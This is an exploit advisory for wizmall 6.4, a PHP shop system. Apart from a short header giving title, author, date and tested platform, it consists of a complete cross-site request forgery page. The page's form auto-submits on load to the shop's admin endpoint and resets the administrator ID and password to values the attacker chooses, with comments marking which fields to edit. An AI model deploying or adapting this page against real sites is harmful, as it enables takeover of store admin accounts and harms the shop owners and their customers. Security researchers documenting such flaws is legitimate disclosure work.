wizmall 6.4 - Cross-Site Request Forgery
# Exploit Title: wizmall 6.4 CSRF Vulnerabilities
# Date: 08/10/2010
# Author: pyw1414 <i2SEC>
# Software Link: http://www.shop-wiz.com/board/main/view/root/wizmall01/159/0
# Version: 6.4 UTF-8 For php
# Tested on: XP SP3
-=[ CSRF Exploit - Change Admin ID/PW ]=-
<html>
<head>
<title>Wizmall 6.4 UTF-8 For php CSRF Vulnerabilities - Change Admin Id/Password</title>
</head>
<body onload="document.csrf.submit();">
<form name="csrf" action="http://[domain]/malladmin/main.php" method="POST">
<!--- Edit these --->
<input type="hidden" name="ID" value="i2sec" />
<input type="hidden" name="PASS" value="test1234" />
<input type="hidden" name="PASS1" value="test1234" />
<!--- Do not edit below --->
<input type="hidden" name="menushow" value="menu1" />
<input type="hidden" name="theme" value="basicconfig/basic_info2" />
<input type="hidden" name="action" value="admin_save" />
<input type="hidden" name="ADMIN_NAME" value="pyw1414" />
<input type="hidden" name="ADMIN_TITLE" value="i2Sec+Plaza" />
<input type="hidden" name="ADMIN_TITLE_E" value="" />
<input type="hidden" name="COMPANY_DOMAIN" value="" />
<input type="hidden" name="str_watermark" value="" />
<input type="hidden" name="img_watermark" value="" />
<input type="hidden" name="HOME_URL" value="" />
<input type="hidden" name="ADMIN_EMAIL" value="[email protected]" />
<input type="hidden" name="ADMIN_TEL" value="" />
<input type="hidden" name="COMPANY_NAME" value="i2Sec" />
<input type="hidden" name="PRESIDENT" value="" />
<input type="hidden" name="COMPANY_NUM" value="" />
<input type="hidden" name="COMPLICENCE_NUM" value="" />
<input type="hidden" name="CUSTOMER_TEL" value="" />
<input type="hidden" name="CUSTOMER_FAX" value="" />
<input type="hidden" name="COMPANY_ADD" value="" />
<input type="hidden" name="COMPLICENCE_NUM" value="" />
<input type="hidden" name="MART_BASEDIR" value="" />
<input type="hidden" name="SYSTEM_BASEDIR" value="" />
<input type="hidden" name="smsModule" value="ANYSMS" />
<input type="hidden" name="sms_id" value="" />
<input type="hidden" name="sms_pwd" value="" />
</form>
</body>
</html>